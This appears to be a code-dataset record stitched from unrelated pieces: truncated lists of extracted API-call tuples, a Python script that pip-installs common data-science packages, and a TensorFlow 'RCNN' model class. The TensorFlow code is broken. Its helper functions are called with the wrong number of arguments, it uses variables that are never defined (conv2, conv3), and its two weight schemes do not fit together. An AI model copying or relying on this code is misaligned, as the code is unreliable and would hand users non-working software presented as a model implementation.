] | [((1740, 1762), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (1760, 1762), False, 'import timeit\n'), ((1833, 1864), 'logging.getLogger', '_logging.getLogger', (['_MODULENAME'], {}), '(_MODULENAME)\n', (1851, 1864), True, 'import logging as _logging\n'), ((2106, 2120), 'pathlib.Path', 'Path', (['__file__'], {}), '(__file__)\n', (2110, 2120), False, 'from pathlib import Path\n'), ((2161, 2186), 'pathlib.Path', 'Path', (['_MODULE_PATH.parent'], {}), '(_MODULE_PATH.parent)\n', (2165, 2186), False, 'from pathlib import Path\n'), ((3186, 3224), 'pathlib.Path', 'Path', (['_PATH_DCCSIG', '"""requirements.txt"""'], {}), "(_PATH_DCCSIG, 'requirements.txt')\n", (3190, 3224), False, 'from pathlib import Path\n'), ((3403, 3423), 'pathlib.Path', 'Path', (['sys.executable'], {}), '(sys.executable)\n', (3407, 3423), False, 'from pathlib import Path\n'), ((3692, 3708), 'pathlib.Path', 'Path', (['python_exe'], {}), '(python_exe)\n', (3696, 3708), False, 'from pathlib import Path\n'), ((4600, 4616), 'pathlib.Path', 'Path', (['python_exe'], {}), '(python_exe)\n', (4604, 4616), False, 'from pathlib import Path\n'), ((5652, 5670), 'pathlib.Path', 'Path', (['_PATH_DCCSIG'], {}), '(_PATH_DCCSIG)\n', (5656, 5670), False, 'from pathlib import Path\n'), ((6301, 6317), 'pathlib.Path', 'Path', (['file_store'], {}), '(file_store)\n', (6305, 6317), False, 'from pathlib import Path\n'), ((6335, 6360), 'pathlib.Path.joinpath', 'Path.joinpath', (['file_store'], {}), '(file_store)\n', (6348, 6360), False, 'from pathlib import Path\n'), ((7334, 7350), 'pathlib.Path', 'Path', (['python_exe'], {}), '(python_exe)\n', (7338, 7350), False, 'from pathlib import Path\n'), ((8865, 8881), 'pathlib.Path', 'Path', (['python_exe'], {}), '(python_exe)\n', (8869, 8881), False, 'from pathlib import Path\n'), ((8901, 8919), 'pathlib.Path', 'Path', (['requirements'], {}), '(requirements)\n', (8905, 8919), False, 'from pathlib import Path\n'), ((8937, 8953), 'pathlib.Path', 'Path', (['target_loc'], {}), '(target_loc)\n', (8941, 8953), False, 'from pathlib import Path\n'), ((9673, 9689), 'pathlib.Path', 'Path', (['python_exe'], {}), '(python_exe)\n', (9677, 9689), False, 'from pathlib import Path\n'), ((9705, 9719), 'pathlib.Path', 'Path', (['pkg_name'], {}), '(pkg_name)\n', (9709, 9719), False, 'from pathlib import Path\n'), ((9737, 9753), 'pathlib.Path', 'Path', (['target_loc'], {}), '(target_loc)\n', (9741, 9753), False, 'from pathlib import Path\n'), ((10364, 10425), 'subprocess.CompletedProcess', 'subprocess.CompletedProcess', ([], {'args': '[]', 'returncode': '(0)', 'stdout': '""""""'}), "(args=[], returncode=0, stdout='')\n", (10391, 10425), False, 'import subprocess\n'), ((11760, 11777), 'pathlib.Path', 'Path', (['_PYTHON_EXE'], {}), '(_PYTHON_EXE)\n', (11764, 11777), False, 'from pathlib import Path\n'), ((13399, 13492), 'logging.basicConfig', '_logging.basicConfig', ([], {'level': '_DCCSI_LOGLEVEL', 'format': 'FRMT_LOG_LONG', 'datefmt': '"""%m-%d %H:%M"""'}), "(level=_DCCSI_LOGLEVEL, format=FRMT_LOG_LONG, datefmt=\n '%m-%d %H:%M')\n", (13419, 13492), True, 'import logging as _logging\n'), ((13552, 13583), 'logging.getLogger', '_logging.getLogger', (['_MODULENAME'], {}), '(_MODULENAME)\n', (13570, 13583), True, 'import logging as _logging\n'), ((13903, 14175), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""O3DE DCCsi Setup (aka Foundation). Will install DCCsi python package dependancies, for various DCC tools."""', 'epilog': '"""It is suggested to use \'-py\' or \'--python_exe\' to pass in the python exe for the target dcc tool."""'}), '(description=\n \'O3DE DCCsi Setup (aka Foundation). Will install DCCsi python package dependancies, for various DCC tools.\'\n , epilog=\n "It is suggested to use \'-py\' or \'--python_exe\' to pass in the python exe for the target dcc tool."\n )\n', (13926, 14175), False, 'import argparse\n'), ((6606, 6623), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (6618, 6623), False, 'import requests\n'), ((7440, 7483), 'subprocess.call', 'subprocess.call', (["[python_exe, '-m', getpip]"], {}), "([python_exe, '-m', getpip])\n", (7455, 7483), False, 'import subprocess\n'), ((7698, 7771), 'subprocess.call', 'subprocess.call', (["[python_exe, '-m', 'pip', 'install', '--upgrade', 'pip']"], {}), "([python_exe, '-m', 'pip', 'install', '--upgrade', 'pip'])\n", (7713, 7771), False, 'import subprocess\n'), ((9184, 9209), 'subprocess.call', 'subprocess.call', (['inst_cmd'], {}), '(inst_cmd)\n', (9199, 9209), False, 'import subprocess\n'), ((9937, 9962), 'subprocess.call', 'subprocess.call', (['inst_cmd'], {}), '(inst_cmd)\n', (9952, 9962), False, 'import subprocess\n'), ((11974, 12048), 'subprocess.Popen', 'subprocess.Popen', (['_COMMAND'], {'stdout': 'subprocess.PIPE', 'stderr': 'subprocess.PIPE'}), '(_COMMAND, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n', (11990, 12048), False, 'import subprocess\n'), ((16524, 16545), 'pathlib.Path', 'Path', (['args.python_exe'], {}), '(args.python_exe)\n', (16528, 16545), False, 'from pathlib import Path\n'), ((18429, 18439), 'sys.exit', 'sys.exit', ([], {}), '()\n', (18437, 18439), False, 'import sys\n'), ((17222, 17232), 'sys.exit', 'sys.exit', ([], {}), '()\n', (17230, 17232), False, 'import sys\n'), ((8354, 8422), 'pathlib.Path', 'Path', (['_PATH_DCCSIG', '"""Tools"""', '"""Resources"""', '"""py27"""', '"""requirements.txt"""'], {}), "(_PATH_DCCSIG, 'Tools', 'Resources', 'py27', 'requirements.txt')\n", (8358, 8422), False, 'from pathlib import Path\n'), ((18332, 18354), 'timeit.default_timer', 'timeit.default_timer', ([], {}), '()\n', (18352, 18354), False, 'import timeit\n')] |
import importlib
import platform
import site
import subprocess
import sys
import traceback
class InstallerClass:
sci_win = ['python', '-m', 'pip', 'install', 'scikit-learn']
nump_win = ['python', '-m', 'pip', 'install', 'numpy']
pan_win = ['python', '-m', 'pip', 'install', 'pandas']
req_win = ['python', '-m', 'pip', 'install', 'requests-html']
bs4_win = ['python', '-m', 'pip', 'install', 'beautifulsoup4']
mat_win = ['python', '-m', 'pip', 'install', 'matplotlib']
sci = ['python3', '-m', 'pip', 'install', 'scikit-learn']
nump = ['python3', '-m', 'pip', 'install', 'numpy']
pan = ['python3', '-m', 'pip', 'install', 'pandas']
req = ['python3', '-m', 'pip', 'install', 'requests-html']
bs4 = ['python3', '-m', 'pip', 'install', 'beautifulsoup4']
mat = ['python3', '-m', 'pip', 'install', 'matplotlib']
def sci_win_method(self):
try:
ret_sci_win = subprocess.run(self.sci_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_sci_win)
except Exception:
traceback.print_exc()
def nump_win_method(self):
try:
ret_nump_win = subprocess.run(self.nump_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_nump_win)
except Exception:
traceback.print_exc()
def pan_win_method(self):
try:
ret_pan_win = subprocess.run(self.pan_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_pan_win)
except Exception:
traceback.print_exc()
def req_win_method(self):
try:
ret_req_win = subprocess.run(self.req_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_req_win)
except Exception:
traceback.print_exc()
def bs4_win_method(self):
try:
ret_bs4_win = subprocess.run(self.bs4_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_bs4_win)
except Exception:
traceback.print_exc()
def mat_win_method(self):
try:
ret_mat_win = subprocess.run(self.mat_win, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_mat_win)
except Exception:
traceback.print_exc()
def sci_method(self):
try:
ret_sci = subprocess.run(self.sci, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_sci)
except Exception:
traceback.print_exc()
def nump_method(self):
try:
ret_nump = subprocess.run(self.nump, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_nump)
except Exception:
traceback.print_exc()
def pan_method(self):
try:
ret_pan = subprocess.run(self.pan, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_pan)
except Exception:
traceback.print_exc()
def req_method(self):
try:
ret_req = subprocess.run(self.req, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_req)
except Exception:
traceback.print_exc()
def bs4_method(self):
try:
ret_bs4 = subprocess.run(self.bs4, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_bs4)
except Exception:
traceback.print_exc()
def mat_method(self):
try:
ret_mat = subprocess.run(self.mat, encoding='utf-8', stderr=subprocess.PIPE)
print(ret_mat)
except Exception:
traceback.print_exc()
if sys.version_info[0] == 2:
print("This installer is Python2 not supported.")
elif sys.version_info[0] == 3:
pf = platform.system()
if pf == 'Windows':
InstClass = InstallerClass()
InstClass.sci_win_method()
InstClass.nump_win_method()
InstClass.pan_win_method()
InstClass.req_win_method()
InstClass.bs4_win_method()
InstClass.mat_win_method()
elif pf == 'Darwin':
InstClass = InstallerClass()
InstClass.sci_method()
InstClass.nump_method()
InstClass.pan_method()
InstClass.req_method()
InstClass.bs4_method()
InstClass.mat_method()
elif pf == 'Linux':
InstClass = InstallerClass()
InstClass.sci_method()
InstClass.nump_method()
InstClass.pan_method()
InstClass.req_method()
InstClass.bs4_method()
InstClass.mat_method()
else:
print("Installer does not support OS other than Windows, MacOS and Linux kernel.")
else:
print("A version other than Python2 and Python3. Does not match.")
importlib.reload(site)
| [
"traceback.print_exc",
"platform.system",
"subprocess.run",
"importlib.reload"
] | [((4649, 4671), 'importlib.reload', 'importlib.reload', (['site'], {}), '(site)\n', (4665, 4671), False, 'import importlib\n'), ((3678, 3695), 'platform.system', 'platform.system', ([], {}), '()\n', (3693, 3695), False, 'import platform\n'), ((926, 996), 'subprocess.run', 'subprocess.run', (['self.sci_win'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.sci_win, encoding='utf-8', stderr=subprocess.PIPE)\n", (940, 996), False, 'import subprocess\n'), ((1160, 1231), 'subprocess.run', 'subprocess.run', (['self.nump_win'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.nump_win, encoding='utf-8', stderr=subprocess.PIPE)\n", (1174, 1231), False, 'import subprocess\n'), ((1394, 1464), 'subprocess.run', 'subprocess.run', (['self.pan_win'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.pan_win, encoding='utf-8', stderr=subprocess.PIPE)\n", (1408, 1464), False, 'import subprocess\n'), ((1626, 1696), 'subprocess.run', 'subprocess.run', (['self.req_win'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.req_win, encoding='utf-8', stderr=subprocess.PIPE)\n", (1640, 1696), False, 'import subprocess\n'), ((1858, 1928), 'subprocess.run', 'subprocess.run', (['self.bs4_win'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.bs4_win, encoding='utf-8', stderr=subprocess.PIPE)\n", (1872, 1928), False, 'import subprocess\n'), ((2090, 2160), 'subprocess.run', 'subprocess.run', (['self.mat_win'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.mat_win, encoding='utf-8', stderr=subprocess.PIPE)\n", (2104, 2160), False, 'import subprocess\n'), ((2314, 2380), 'subprocess.run', 'subprocess.run', (['self.sci'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.sci, encoding='utf-8', stderr=subprocess.PIPE)\n", (2328, 2380), False, 'import subprocess\n'), ((2532, 2599), 'subprocess.run', 'subprocess.run', (['self.nump'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.nump, encoding='utf-8', stderr=subprocess.PIPE)\n", (2546, 2599), False, 'import subprocess\n'), ((2750, 2816), 'subprocess.run', 'subprocess.run', (['self.pan'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.pan, encoding='utf-8', stderr=subprocess.PIPE)\n", (2764, 2816), False, 'import subprocess\n'), ((2966, 3032), 'subprocess.run', 'subprocess.run', (['self.req'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.req, encoding='utf-8', stderr=subprocess.PIPE)\n", (2980, 3032), False, 'import subprocess\n'), ((3182, 3248), 'subprocess.run', 'subprocess.run', (['self.bs4'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.bs4, encoding='utf-8', stderr=subprocess.PIPE)\n", (3196, 3248), False, 'import subprocess\n'), ((3398, 3464), 'subprocess.run', 'subprocess.run', (['self.mat'], {'encoding': '"""utf-8"""', 'stderr': 'subprocess.PIPE'}), "(self.mat, encoding='utf-8', stderr=subprocess.PIPE)\n", (3412, 3464), False, 'import subprocess\n'), ((1066, 1087), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (1085, 1087), False, 'import traceback\n'), ((1302, 1323), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (1321, 1323), False, 'import traceback\n'), ((1534, 1555), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (1553, 1555), False, 'import traceback\n'), ((1766, 1787), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (1785, 1787), False, 'import traceback\n'), ((1998, 2019), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2017, 2019), False, 'import traceback\n'), ((2230, 2251), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2249, 2251), False, 'import traceback\n'), ((2446, 2467), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2465, 2467), False, 'import traceback\n'), ((2666, 2687), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2685, 2687), False, 'import traceback\n'), ((2882, 2903), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (2901, 2903), False, 'import traceback\n'), ((3098, 3119), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (3117, 3119), False, 'import traceback\n'), ((3314, 3335), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (3333, 3335), False, 'import traceback\n'), ((3530, 3551), 'traceback.print_exc', 'traceback.print_exc', ([], {}), '()\n', (3549, 3551), False, 'import traceback\n')] |
"""RCNN model
"""
import tensorflow as tf
from define_scope import define_scope # custom decorators
class Model:
def __init__(self, X, y, output_size=None,
learning_rate=1e-5, learning_rate_decay=0.95,
reg=1e-5, dropout=0.5, verbose=False):
"""
Initalize the model.
Inputs:
- output_size: number of classes C
- learning_rate: Scalar giving learning rate for optimization.
- learning_rate_decay: Scalar giving factor used to decay the learning rate
after each epoch.
"""
self.X = X
self.y = y
self.learning_rate = learning_rate
self.learning_rate_decay = learning_rate_decay
self.dropout = dropout
# Store layers weight & bias
self.params = {
# input is [1, 9, 9, 1]
# 3x3 conv, 1 input, 8 outputs
'Wc1': tf.Variable(tf.random_normal([1, 1, 1, 32]), name='Wc1'),
# 3x3 conv, 8 inputs, 16 outputs
'Wc2': tf.Variable(tf.random_normal([3, 3, 32, 32]), name='Wc2'), # shared
# fully connected, 9*9*16 inputs, 512 outputs
'Wd1': tf.Variable(tf.random_normal([9 * 9 * 32, 32])),
# 512 inputs, 2 outputs (class prediction)
'Wout': tf.Variable(tf.random_normal([32, output_size])), # n_classes
# biases
'bc1': tf.Variable(tf.random_normal([32])),
'bc2': tf.Variable(tf.random_normal([32])),
'bd1': tf.Variable(tf.random_normal([32])),
'bout': tf.Variable(tf.random_normal([output_size])) # n_classes
}
# Instantiate functions once
# self.loss
# self.inference
# self.train
# self.predict
@define_scope
def inference(self):
"""
Setting up inference of model
Returns:
logits
"""
# Create some wrappers for simplicity
def conv2d(X, W, b, strides=1):
# Conv2D wrapper, with bias and relu activation
X = tf.nn.conv2d(X, W, strides=[1, strides, strides, 1], padding='SAME')
X = tf.nn.bias_add(X, b)
return tf.nn.relu(X)
def weight_variable(shape):
"""Create a weight variable with appropriate initialization."""
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
"""Create a bias variable with appropriate initialization."""
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def variable_summaries(var, name):
"""Attach a lot of summaries to a Tensor."""
with tf.name_scope('summaries'):
mean = tf.reduce_mean(var)
tf.scalar_summary('mean/' + name, mean)
with tf.name_scope('stddev'):
stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))
tf.scalar_summary('stddev/' + name, stddev)
tf.scalar_summary('max/' + name, tf.reduce_max(var))
tf.scalar_summary('min/' + name, tf.reduce_min(var))
tf.histogram_summary(name, var)
def nn_layer(input_tensor, input_dim, output_dim, layer_name, act=tf.nn.relu):
"""Rusable layer code for tensorboard naming
See: https://github.com/tensorflow/tensorflow/blob/r0.11/tensorflow/examples/tutorials/mnist/mnist_with_summaries.py
"""
with tf.name_scope(layer_name):
# This Variable will hold the state of the weights for the layer
with tf.name_scope('weights'):
weights = weight_variable([input_dim, output_dim])
variable_summaries(weights, layer_name + '/weights')
with tf.name_scope('biases'):
biases = bias_variable([output_dim])
variable_summaries(biases, layer_name + '/biases')
with tf.name_scope('Wx_plus_b'):
preactivate = tf.matmul(input_tensor, weights) + biases
tf.histogram_summary(layer_name + '/pre_activations', preactivate)
activations = act(preactivate, name='activation')
tf.histogram_summary(layer_name + '/activations', activations)
return activations
def conv_relu(input_tensor, kernel_shape, bias_shape):
# Create variable named "weights".
weights = tf.get_variable("weights", kernel_shape,
initializer=tf.random_normal_initializer())
# Create variable named "biases".
biases = tf.get_variable("biases", bias_shape,
initializer=tf.constant_initializer(0.0))
conv = tf.nn.conv2d(input_tensor, weights,
strides=[1, 1, 1, 1], padding='SAME')
return tf.nn.relu(conv + biases)
def board_filter(input_board):
with tf.variable_scope('conv1'):
relu1 = conv_relu(input_board, [3, 3, 32, 32], [32])
with tf.variable_scope('conv2'):
return conv_relu(relu1, [3, 3, 32, 32], [32])
# Unpack parameters
X = self.X
params = self.params
# Convolution Layer
with tf.variable_scope('conv1'):
conv1 = conv_relu(X, [1, 1, 1, 32], [32], 'conv1')
# conv1 = conv2d(X, params['Wc1'], params['bc1'])
# Convolution Layer
with tf.variable_scope('board_filters') as scope:
# conv2 = conv2d(conv1, params['Wc2'], params['bc2'])
result1 = board_filter(conv1, [3, 3, 32, 32], [32], 'conv2')
# Convolution Layer,
# Share weights within scope
scope.reuse_variables()
# conv3 = conv2d(conv2, params['Wc2'], params['bc2'])
result2 = board_filter(conv2, [3, 3, 32, 32], [32], 'conv3')
# with tf.variable_scope("foo"):
# v = tf.get_variable("v", [1])
# tf.get_variable_scope().reuse_variables()
# v1 = tf.get_variable("v", [1])
# assert v1 is v
# Fully connected layer
# Reshape conv2 output to fit fully connected layer input
fc1 = tf.reshape(conv3, [-1, 9 * 9 * 32])
fc1 = tf.add(tf.matmul(fc1, params['Wd1']), params['bd1'])
fc1 = tf.nn.relu(fc1)
# Apply Dropout
with tf.name_scope('dropout'):
tf.scalar_summary('dropout_keep_probability', self.dropout)
fc1 = tf.nn.dropout(fc1, self.dropout)
# Output, class prediction
# out = tf.add(tf.matmul(fc1, params['Wout']), params['bout'])
out = nn_layer(fc1, 32, 2, 'out', act=tf.identity)
return out
@define_scope
def train(self):
"""
Train
"""
with tf.name_scope('train'):
optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate)
minimize = optimizer.minimize(self.loss)
return minimize
@define_scope
def loss(self):
"""
Cost
"""
with tf.name_scope('cross_entopy'):
diff = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=self.inference, labels=self.y)
with tf.name_scope('total'):
cross_entropy = tf.reduce_mean(diff)
tf.summary.scalar('cross_entropy', cross_entropy)
return cross_entropy
@define_scope
def predict(self):
"""
Predict
"""
with tf.name_scope('accuracy'):
with tf.name_scope('correct_prediction'):
correct_prediction = tf.nn.in_top_k(self.inference, self.y, 1)
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
tf.scalar_summary('accuracy', accuracy)
return accuracy
| [
"tensorflow.nn.sparse_softmax_cross_entropy_with_logits",
"tensorflow.nn.dropout",
"tensorflow.reduce_mean",
"tensorflow.cast",
"tensorflow.reduce_min",
"tensorflow.random_normal",
"tensorflow.nn.in_top_k",
"tensorflow.random_normal_initializer",
"tensorflow.histogram_summary",
"tensorflow.matmul"... | [((5194, 5229), 'tensorflow.reshape', 'tf.reshape', (['conv3', '[-1, 9 * 9 * 32]'], {}), '(conv3, [-1, 9 * 9 * 32])\n', (5204, 5229), True, 'import tensorflow as tf\n'), ((5299, 5314), 'tensorflow.nn.relu', 'tf.nn.relu', (['fc1'], {}), '(fc1)\n', (5309, 5314), True, 'import tensorflow as tf\n'), ((6116, 6165), 'tensorflow.summary.scalar', 'tf.summary.scalar', (['"""cross_entropy"""', 'cross_entropy'], {}), "('cross_entropy', cross_entropy)\n", (6133, 6165), True, 'import tensorflow as tf\n'), ((6501, 6540), 'tensorflow.scalar_summary', 'tf.scalar_summary', (['"""accuracy"""', 'accuracy'], {}), "('accuracy', accuracy)\n", (6518, 6540), True, 'import tensorflow as tf\n'), ((1717, 1785), 'tensorflow.nn.conv2d', 'tf.nn.conv2d', (['X', 'W'], {'strides': '[1, strides, strides, 1]', 'padding': '"""SAME"""'}), "(X, W, strides=[1, strides, strides, 1], padding='SAME')\n", (1729, 1785), True, 'import tensorflow as tf\n'), ((1793, 1813), 'tensorflow.nn.bias_add', 'tf.nn.bias_add', (['X', 'b'], {}), '(X, b)\n', (1807, 1813), True, 'import tensorflow as tf\n'), ((1824, 1837), 'tensorflow.nn.relu', 'tf.nn.relu', (['X'], {}), '(X)\n', (1834, 1837), True, 'import tensorflow as tf\n'), ((1949, 1987), 'tensorflow.truncated_normal', 'tf.truncated_normal', (['shape'], {'stddev': '(0.1)'}), '(shape, stddev=0.1)\n', (1968, 1987), True, 'import tensorflow as tf\n'), ((1998, 2018), 'tensorflow.Variable', 'tf.Variable', (['initial'], {}), '(initial)\n', (2009, 2018), True, 'import tensorflow as tf\n'), ((2126, 2155), 'tensorflow.constant', 'tf.constant', (['(0.1)'], {'shape': 'shape'}), '(0.1, shape=shape)\n', (2137, 2155), True, 'import tensorflow as tf\n'), ((2166, 2186), 'tensorflow.Variable', 'tf.Variable', (['initial'], {}), '(initial)\n', (2177, 2186), True, 'import tensorflow as tf\n'), ((2343, 2382), 'tensorflow.scalar_summary', 'tf.scalar_summary', (["('mean/' + name)", 'mean'], {}), "('mean/' + name, mean)\n", (2360, 2382), True, 'import tensorflow as tf\n'), ((2479, 2522), 'tensorflow.scalar_summary', 'tf.scalar_summary', (["('stddev/' + name)", 'stddev'], {}), "('stddev/' + name, stddev)\n", (2496, 2522), True, 'import tensorflow as tf\n'), ((2638, 2669), 'tensorflow.histogram_summary', 'tf.histogram_summary', (['name', 'var'], {}), '(name, var)\n', (2658, 2669), True, 'import tensorflow as tf\n'), ((3540, 3602), 'tensorflow.histogram_summary', 'tf.histogram_summary', (["(layer_name + '/activations')", 'activations'], {}), "(layer_name + '/activations', activations)\n", (3560, 3602), True, 'import tensorflow as tf\n'), ((3966, 4039), 'tensorflow.nn.conv2d', 'tf.nn.conv2d', (['input_tensor', 'weights'], {'strides': '[1, 1, 1, 1]', 'padding': '"""SAME"""'}), "(input_tensor, weights, strides=[1, 1, 1, 1], padding='SAME')\n", (3978, 4039), True, 'import tensorflow as tf\n'), ((4054, 4079), 'tensorflow.nn.relu', 'tf.nn.relu', (['(conv + biases)'], {}), '(conv + biases)\n', (4064, 4079), True, 'import tensorflow as tf\n'), ((4383, 4409), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""conv1"""'], {}), "('conv1')\n", (4400, 4409), True, 'import tensorflow as tf\n'), ((4550, 4584), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""board_filters"""'], {}), "('board_filters')\n", (4567, 4584), True, 'import tensorflow as tf\n'), ((5245, 5274), 'tensorflow.matmul', 'tf.matmul', (['fc1', "params['Wd1']"], {}), "(fc1, params['Wd1'])\n", (5254, 5274), True, 'import tensorflow as tf\n'), ((5340, 5364), 'tensorflow.name_scope', 'tf.name_scope', (['"""dropout"""'], {}), "('dropout')\n", (5353, 5364), True, 'import tensorflow as tf\n'), ((5369, 5428), 'tensorflow.scalar_summary', 'tf.scalar_summary', (['"""dropout_keep_probability"""', 'self.dropout'], {}), "('dropout_keep_probability', self.dropout)\n", (5386, 5428), True, 'import tensorflow as tf\n'), ((5438, 5470), 'tensorflow.nn.dropout', 'tf.nn.dropout', (['fc1', 'self.dropout'], {}), '(fc1, self.dropout)\n', (5451, 5470), True, 'import tensorflow as tf\n'), ((5693, 5715), 'tensorflow.name_scope', 'tf.name_scope', (['"""train"""'], {}), "('train')\n", (5706, 5715), True, 'import tensorflow as tf\n'), ((5732, 5788), 'tensorflow.train.AdamOptimizer', 'tf.train.AdamOptimizer', ([], {'learning_rate': 'self.learning_rate'}), '(learning_rate=self.learning_rate)\n', (5754, 5788), True, 'import tensorflow as tf\n'), ((5910, 5939), 'tensorflow.name_scope', 'tf.name_scope', (['"""cross_entopy"""'], {}), "('cross_entopy')\n", (5923, 5939), True, 'import tensorflow as tf\n'), ((5951, 6039), 'tensorflow.nn.sparse_softmax_cross_entropy_with_logits', 'tf.nn.sparse_softmax_cross_entropy_with_logits', ([], {'logits': 'self.inference', 'labels': 'self.y'}), '(logits=self.inference,\n labels=self.y)\n', (5997, 6039), True, 'import tensorflow as tf\n'), ((6254, 6279), 'tensorflow.name_scope', 'tf.name_scope', (['"""accuracy"""'], {}), "('accuracy')\n", (6267, 6279), True, 'import tensorflow as tf\n'), ((767, 798), 'tensorflow.random_normal', 'tf.random_normal', (['[1, 1, 1, 32]'], {}), '([1, 1, 1, 32])\n', (783, 798), True, 'import tensorflow as tf\n'), ((871, 903), 'tensorflow.random_normal', 'tf.random_normal', (['[3, 3, 32, 32]'], {}), '([3, 3, 32, 32])\n', (887, 903), True, 'import tensorflow as tf\n'), ((999, 1033), 'tensorflow.random_normal', 'tf.random_normal', (['[9 * 9 * 32, 32]'], {}), '([9 * 9 * 32, 32])\n', (1015, 1033), True, 'import tensorflow as tf\n'), ((1105, 1140), 'tensorflow.random_normal', 'tf.random_normal', (['[32, output_size]'], {}), '([32, output_size])\n', (1121, 1140), True, 'import tensorflow as tf\n'), ((1191, 1213), 'tensorflow.random_normal', 'tf.random_normal', (['[32]'], {}), '([32])\n', (1207, 1213), True, 'import tensorflow as tf\n'), ((1238, 1260), 'tensorflow.random_normal', 'tf.random_normal', (['[32]'], {}), '([32])\n', (1254, 1260), True, 'import tensorflow as tf\n'), ((1285, 1307), 'tensorflow.random_normal', 'tf.random_normal', (['[32]'], {}), '([32])\n', (1301, 1307), True, 'import tensorflow as tf\n'), ((1333, 1364), 'tensorflow.random_normal', 'tf.random_normal', (['[output_size]'], {}), '([output_size])\n', (1349, 1364), True, 'import tensorflow as tf\n'), ((2281, 2307), 'tensorflow.name_scope', 'tf.name_scope', (['"""summaries"""'], {}), "('summaries')\n", (2294, 2307), True, 'import tensorflow as tf\n'), ((2320, 2339), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['var'], {}), '(var)\n', (2334, 2339), True, 'import tensorflow as tf\n'), ((2391, 2414), 'tensorflow.name_scope', 'tf.name_scope', (['"""stddev"""'], {}), "('stddev')\n", (2404, 2414), True, 'import tensorflow as tf\n'), ((2559, 2577), 'tensorflow.reduce_max', 'tf.reduce_max', (['var'], {}), '(var)\n', (2572, 2577), True, 'import tensorflow as tf\n'), ((2615, 2633), 'tensorflow.reduce_min', 'tf.reduce_min', (['var'], {}), '(var)\n', (2628, 2633), True, 'import tensorflow as tf\n'), ((2937, 2962), 'tensorflow.name_scope', 'tf.name_scope', (['layer_name'], {}), '(layer_name)\n', (2950, 2962), True, 'import tensorflow as tf\n'), ((4122, 4148), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""conv1"""'], {}), "('conv1')\n", (4139, 4148), True, 'import tensorflow as tf\n'), ((4215, 4241), 'tensorflow.variable_scope', 'tf.variable_scope', (['"""conv2"""'], {}), "('conv2')\n", (4232, 4241), True, 'import tensorflow as tf\n'), ((6049, 6071), 'tensorflow.name_scope', 'tf.name_scope', (['"""total"""'], {}), "('total')\n", (6062, 6071), True, 'import tensorflow as tf\n'), ((6093, 6113), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['diff'], {}), '(diff)\n', (6107, 6113), True, 'import tensorflow as tf\n'), ((6289, 6324), 'tensorflow.name_scope', 'tf.name_scope', (['"""correct_prediction"""'], {}), "('correct_prediction')\n", (6302, 6324), True, 'import tensorflow as tf\n'), ((6351, 6392), 'tensorflow.nn.in_top_k', 'tf.nn.in_top_k', (['self.inference', 'self.y', '(1)'], {}), '(self.inference, self.y, 1)\n', (6365, 6392), True, 'import tensorflow as tf\n'), ((6401, 6426), 'tensorflow.name_scope', 'tf.name_scope', (['"""accuracy"""'], {}), "('accuracy')\n", (6414, 6426), True, 'import tensorflow as tf\n'), ((3042, 3066), 'tensorflow.name_scope', 'tf.name_scope', (['"""weights"""'], {}), "('weights')\n", (3055, 3066), True, 'import tensorflow as tf\n'), ((3191, 3214), 'tensorflow.name_scope', 'tf.name_scope', (['"""biases"""'], {}), "('biases')\n", (3204, 3214), True, 'import tensorflow as tf\n'), ((3323, 3349), 'tensorflow.name_scope', 'tf.name_scope', (['"""Wx_plus_b"""'], {}), "('Wx_plus_b')\n", (3336, 3349), True, 'import tensorflow as tf\n'), ((3417, 3483), 'tensorflow.histogram_summary', 'tf.histogram_summary', (["(layer_name + '/pre_activations')", 'preactivate'], {}), "(layer_name 